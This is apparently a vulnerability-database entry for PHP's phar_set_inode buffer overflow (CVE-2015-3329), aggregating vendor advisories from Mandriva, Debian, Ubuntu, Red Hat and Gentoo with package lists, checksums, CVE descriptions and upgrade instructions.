04e689ed1f9163a149f3448cfe4bd218 mbs1/x86_64/php-sqlite3-5.5.24-1.mbs1.x86_64.rpm a39905d2eae282b1d06db94afbf51255 mbs1/x86_64/php-sybase_ct-5.5.24-1.mbs1.x86_64.rpm a7fd332d4fea37c9f3335a0d8921f228 mbs1/x86_64/php-sysvmsg-5.5.24-1.mbs1.x86_64.rpm b9fdd882caee7f469d3c285082e8f717 mbs1/x86_64/php-sysvsem-5.5.24-1.mbs1.x86_64.rpm 79ede61a89fae9e6fab33f1a99b3ded7 mbs1/x86_64/php-sysvshm-5.5.24-1.mbs1.x86_64.rpm 5f0b1072e400ccc886979e7647c160f2 mbs1/x86_64/php-tidy-5.5.24-1.mbs1.x86_64.rpm 1df6d933d3f5c14bb334b8e49df50901 mbs1/x86_64/php-timezonedb-2015.4-1.mbs1.x86_64.rpm e03d364e8d94dc5e509f89ad06b1ceec mbs1/x86_64/php-tokenizer-5.5.24-1.mbs1.x86_64.rpm 4eb33980b578bc3f7c8436993e401a6b mbs1/x86_64/php-wddx-5.5.24-1.mbs1.x86_64.rpm cfb0b798a98736cebe6d2854610e5c88 mbs1/x86_64/php-xml-5.5.24-1.mbs1.x86_64.rpm 2d05b6ecae1866827a732b19bdea2682 mbs1/x86_64/php-xmlreader-5.5.24-1.mbs1.x86_64.rpm bab20d281d211f8202d881723f0091f1 mbs1/x86_64/php-xmlrpc-5.5.24-1.mbs1.x86_64.rpm d213f4b86b0532049556a37958d12570 mbs1/x86_64/php-xmlwriter-5.5.24-1.mbs1.x86_64.rpm a43e88b8cb0cf9a46d63f318d63853c7 mbs1/x86_64/php-xsl-5.5.24-1.mbs1.x86_64.rpm 3150b97e91d4363c5b79b6e67cf4febe mbs1/x86_64/php-zip-5.5.24-1.mbs1.x86_64.rpm 962d3621008091b8186481e521296d29 mbs1/x86_64/php-zlib-5.5.24-1.mbs1.x86_64.rpm 52139e1dbd986bf5b685ee0f92e67da2 mbs1/SRPMS/php-5.5.24-1.mbs1.src.rpm 854f5600d70006910d80643b638289d4 mbs1/SRPMS/php-apc-3.1.15-1.18.mbs1.src.rpm 77e0fad280231397615e51f099b33f1c mbs1/SRPMS/php-timezonedb-2015.4-1.mbs1.src.rpm
Mandriva Business Server 2/X86_64: 2a2dcd3f73583e81c1d4ca142814ed6a mbs2/x86_64/apache-mod_php-5.5.24-1.mbs2.x86_64.rpm a7964f16c85b0772835366fa821f7dd1 mbs2/x86_64/lib64php5_common5-5.5.24-1.mbs2.x86_64.rpm 624d6512573e4ccc202f9ea08433727e mbs2/x86_64/php-bcmath-5.5.24-1.mbs2.x86_64.rpm dd817015c54820a9fc967da7db4b1461 mbs2/x86_64/php-bz2-5.5.24-1.mbs2.x86_64.rpm 1c022b50d3f12d3e8e358fca3afe6f0f mbs2/x86_64/php-calendar-5.5.24-1.mbs2.x86_64.rpm 52159b3e747e424b1fe40944f404b45d mbs2/x86_64/php-cgi-5.5.24-1.mbs2.x86_64.rpm 5ac82cf4acc95e8d8a80537173a1dc98 mbs2/x86_64/php-cli-5.5.24-1.mbs2.x86_64.rpm e7271551aa14e6931b0ba22ee33d3712 mbs2/x86_64/php-ctype-5.5.24-1.mbs2.x86_64.rpm 7293fa4917183914c356cc2376a5e1ab mbs2/x86_64/php-curl-5.5.24-1.mbs2.x86_64.rpm 258058f8e1cda5be8a9444964a553691 mbs2/x86_64/php-dba-5.5.24-1.mbs2.x86_64.rpm c0a6fa757e9ffda700f65a93442564d4 mbs2/x86_64/php-devel-5.5.24-1.mbs2.x86_64.rpm c06bc210915a004b2b9fcd084f853e20 mbs2/x86_64/php-doc-5.5.24-1.mbs2.noarch.rpm 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mbs2/x86_64/php-zlib-5.5.24-1.mbs2.x86_64.rpm 8cdfdd3582b44c38d735c58aea9e45f7 mbs2/SRPMS/php-5.5.24-1.mbs2.src.rpm 09afb4a05a8a1add563f2cb348fb2b0d mbs2/SRPMS/php-timezonedb-2015.4-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
CVE-2015-4024
Denial of service when processing multipart/form-data requests.
For the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.
We recommend that you upgrade your php5 packages
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.6,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "php",
"scope": "eq",
"trust": 1.0,
"vendor": "php",
"version": "5.5.14"
},
{
"_id": null,
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"data": "Multiple stack-based buffer overflows in the phar_set_inode function in phar_internal.h in PHP before 5.4.40, 5.5.x before 5.5.24, and 5.6.x before 5.6.8 allow remote attackers to execute arbitrary code via a crafted length value in a (1) tar, (2) phar, or (3) ZIP archive. PHP is prone to a buffer-overflow vulnerability. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The following versions are affected: PHP prior to 5.4.40, 5.5.x prior to 5.5.24, and 5.6.x prior to 5.6.8. ==========================================================================\nUbuntu Security Notice USN-2572-1\nApril 20, 2015\n\nphp5 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in PHP. This issue only applied to\nUbuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)\n\nIt was discovered that PHP incorrectly handled unserializing PHAR files. \n(CVE-2015-2787)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.4\n php5-cgi 5.5.12+dfsg-2ubuntu4.4\n php5-cli 5.5.12+dfsg-2ubuntu4.4\n php5-fpm 5.5.12+dfsg-2ubuntu4.4\n\nUbuntu 14.04 LTS:\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.9\n php5-cgi 5.5.9+dfsg-1ubuntu4.9\n php5-cli 5.5.9+dfsg-1ubuntu4.9\n php5-fpm 5.5.9+dfsg-1ubuntu4.9\n\nUbuntu 12.04 LTS:\n libapache2-mod-php5 5.3.10-1ubuntu3.18\n php5-cgi 5.3.10-1ubuntu3.18\n php5-cli 5.3.10-1ubuntu3.18\n php5-fpm 5.3.10-1ubuntu3.18\n\nUbuntu 10.04 LTS:\n libapache2-mod-php5 5.3.2-1ubuntu4.30\n php5-cgi 5.3.2-1ubuntu4.30\n php5-cli 5.3.2-1ubuntu4.30\n\nIn general, a standard system update will make all the necessary changes. 6) - i386, x86_64\n\n3. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php security and bug fix update\nAdvisory ID: RHSA-2015:1135-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html\nIssue date: 2015-06-23\nCVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 \n CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 \n CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 \n CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 \n CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 \n CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 \n CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 \n CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 \n CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server. \n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP\u0027s Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application. \n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP\u0027s FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP\u0027s Phar extension parsed\nPhar archives. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP\u0027s File Information (fileinfo) extension. \nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP\u0027s enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash. \n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption. \n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize()\n1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)\n1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c\n1188599 - CVE-2014-9652 file: out of bounds read in mconvert()\n1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c\n1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone\n1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict()\n1194747 - CVE-2015-2301 php: use after free in phar_object.c\n1204868 - CVE-2015-4147 php: SoapClient\u0027s __call() type confusion through unserialize()\n1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re\n1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name\n1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4\n1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions\n1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo\n1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing\n1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode()\n1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS\n1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods\n1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+\n1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing\n1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character\n1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name\n1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata()\n1226916 - CVE-2015-4148 php: SoapClient\u0027s do_soap_call() type confusion after unserialize()\n1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions\n1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions\n1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize\n1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion\n\n6. Package List:\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nppc64:\nphp-5.4.16-36.el7_1.ppc64.rpm\nphp-cli-5.4.16-36.el7_1.ppc64.rpm\nphp-common-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-gd-5.4.16-36.el7_1.ppc64.rpm\nphp-ldap-5.4.16-36.el7_1.ppc64.rpm\nphp-mysql-5.4.16-36.el7_1.ppc64.rpm\nphp-odbc-5.4.16-36.el7_1.ppc64.rpm\nphp-pdo-5.4.16-36.el7_1.ppc64.rpm\nphp-pgsql-5.4.16-36.el7_1.ppc64.rpm\nphp-process-5.4.16-36.el7_1.ppc64.rpm\nphp-recode-5.4.16-36.el7_1.ppc64.rpm\nphp-soap-5.4.16-36.el7_1.ppc64.rpm\nphp-xml-5.4.16-36.el7_1.ppc64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-5.4.16-36.el7_1.s390x.rpm\nphp-cli-5.4.16-36.el7_1.s390x.rpm\nphp-common-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-gd-5.4.16-36.el7_1.s390x.rpm\nphp-ldap-5.4.16-36.el7_1.s390x.rpm\nphp-mysql-5.4.16-36.el7_1.s390x.rpm\nphp-odbc-5.4.16-36.el7_1.s390x.rpm\nphp-pdo-5.4.16-36.el7_1.s390x.rpm\nphp-pgsql-5.4.16-36.el7_1.s390x.rpm\nphp-process-5.4.16-36.el7_1.s390x.rpm\nphp-recode-5.4.16-36.el7_1.s390x.rpm\nphp-soap-5.4.16-36.el7_1.s390x.rpm\nphp-xml-5.4.16-36.el7_1.s390x.rpm\nphp-xmlrpc-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp-5.4.16-36.ael7b_1.src.rpm\n\nppc64le:\nphp-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-cli-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-common-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-gd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-ldap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-odbc-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pdo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-process-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-recode-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-soap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xml-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nphp-bcmath-5.4.16-36.el7_1.ppc64.rpm\nphp-dba-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-devel-5.4.16-36.el7_1.ppc64.rpm\nphp-embedded-5.4.16-36.el7_1.ppc64.rpm\nphp-enchant-5.4.16-36.el7_1.ppc64.rpm\nphp-fpm-5.4.16-36.el7_1.ppc64.rpm\nphp-intl-5.4.16-36.el7_1.ppc64.rpm\nphp-mbstring-5.4.16-36.el7_1.ppc64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.ppc64.rpm\nphp-pspell-5.4.16-36.el7_1.ppc64.rpm\nphp-snmp-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-bcmath-5.4.16-36.el7_1.s390x.rpm\nphp-dba-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-devel-5.4.16-36.el7_1.s390x.rpm\nphp-embedded-5.4.16-36.el7_1.s390x.rpm\nphp-enchant-5.4.16-36.el7_1.s390x.rpm\nphp-fpm-5.4.16-36.el7_1.s390x.rpm\nphp-intl-5.4.16-36.el7_1.s390x.rpm\nphp-mbstring-5.4.16-36.el7_1.s390x.rpm\nphp-mysqlnd-5.4.16-36.el7_1.s390x.rpm\nphp-pspell-5.4.16-36.el7_1.s390x.rpm\nphp-snmp-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nphp-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-dba-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-devel-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-embedded-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-enchant-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-fpm-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-intl-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pspell-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-snmp-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8142\nhttps://access.redhat.com/security/cve/CVE-2014-9652\nhttps://access.redhat.com/security/cve/CVE-2014-9705\nhttps://access.redhat.com/security/cve/CVE-2014-9709\nhttps://access.redhat.com/security/cve/CVE-2015-0231\nhttps://access.redhat.com/security/cve/CVE-2015-0232\nhttps://access.redhat.com/security/cve/CVE-2015-0273\nhttps://access.redhat.com/security/cve/CVE-2015-2301\nhttps://access.redhat.com/security/cve/CVE-2015-2348\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-2787\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4147\nhttps://access.redhat.com/security/cve/CVE-2015-4148\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4599\nhttps://access.redhat.com/security/cve/CVE-2015-4600\nhttps://access.redhat.com/security/cve/CVE-2015-4601\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFViR1aXlSAg2UNWIIRAuxPAJ42GLQVzvzc9kje0VjDv8NZWcPv6QCbBL+O\ndtqycPWs+07GhjmZ6NNx5Bg=\n=FREZ\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201606-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: PHP: Multiple vulnerabilities\n Date: June 19, 2016\n Bugs: #537586, #541098, #544186, #544330, #546872, #549538,\n #552408, #555576, #555830, #556952, #559612, #562882,\n #571254, #573892, #577376\n ID: 201606-10\n\n- - - - - - - - - - - - - - 